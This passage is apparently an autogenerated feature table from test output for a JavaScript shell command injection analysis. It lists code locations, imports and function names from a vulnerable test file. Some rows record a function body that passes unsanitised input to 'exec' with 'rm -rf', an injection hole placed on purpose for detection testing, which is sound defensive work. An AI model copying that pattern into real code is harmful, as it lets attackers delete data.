name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:18:10:18:12 | cla | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:18:10:18:12 | cla | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:18:10:18:12 | cla | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:18:10:18:12 | cla | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:19:1:19:3 | cla | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:19:1:19:3 | cla | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:19:1:19:3 | cla | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:19:1:19:13 | cla.prototype | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:19:1:19:13 | cla.prototype | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:19:1:19:13 | cla.prototype | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:19:1:19:20 | cla.prototype.method | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:19:1:19:20 | cla.prototype.method | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:19:1:19:20 | cla.prototype.method | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:19:1:21:1 | cla.pro ... OT OK\\n} | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:19:1:21:1 | cla.pro ... OT OK\\n} | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:19:1:21:1 | cla.pro ... OT OK\\n} | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:19:5:19:13 | prototype | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:19:5:19:13 | prototype | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:19:5:19:13 | prototype | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:19:15:19:20 | method | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:19:15:19:20 | method | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:19:15:19:20 | method | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:19:24:19:23 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:19:24:19:23 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:19:24:19:23 | cp | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:19:24:19:23 | cp | enclosingFunctionName | method | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:19:24:19:23 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:19:24:19:23 | this | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:19:24:19:23 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:19:24:19:23 | this | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:19:24:19:23 | this | enclosingFunctionName | method | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:19:24:19:23 | this | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:19:24:21:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:19:24:21:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:19:24:21:1 | 'arguments' object of anonymous function | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:19:24:21:1 | 'arguments' object of anonymous function | enclosingFunctionName | method | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:19:24:21:1 | 'arguments' object of anonymous function | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:19:24:21:1 | exceptional return of anonymous function | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:19:24:21:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:19:24:21:1 | exceptional return of anonymous function | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:19:24:21:1 | exceptional return of anonymous function | enclosingFunctionName | method | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:19:24:21:1 | exceptional return of anonymous function | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:19:24:21:1 | functio ... OT OK\\n} | assignedToPropName | method | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:19:24:21:1 | functio ... OT OK\\n} | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:19:24:21:1 | functio ... OT OK\\n} | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:19:24:21:1 | functio ... OT OK\\n} | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:19:24:21:1 | return of anonymous function | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:19:24:21:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:19:24:21:1 | return of anonymous function | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:19:24:21:1 | return of anonymous function | enclosingFunctionName | method | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:19:24:21:1 | return of anonymous function | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:19:34:19:37 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:19:34:19:37 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:19:34:19:37 | name | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:19:34:19:37 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:19:34:19:37 | name | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:19:34:19:37 | name | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:19:34:19:37 | name | enclosingFunctionName | method | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:19:34:19:37 | name | enclosingFunctionName | method | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:19:34:19:37 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:19:34:19:37 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:20:2:20:3 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:20:2:20:3 | cp | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:20:2:20:3 | cp | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:20:2:20:3 | cp | enclosingFunctionName | method | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:20:2:20:3 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:20:2:20:8 | cp.exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:20:2:20:8 | cp.exec | contextSurroundingFunctionParameters | (name) | +| 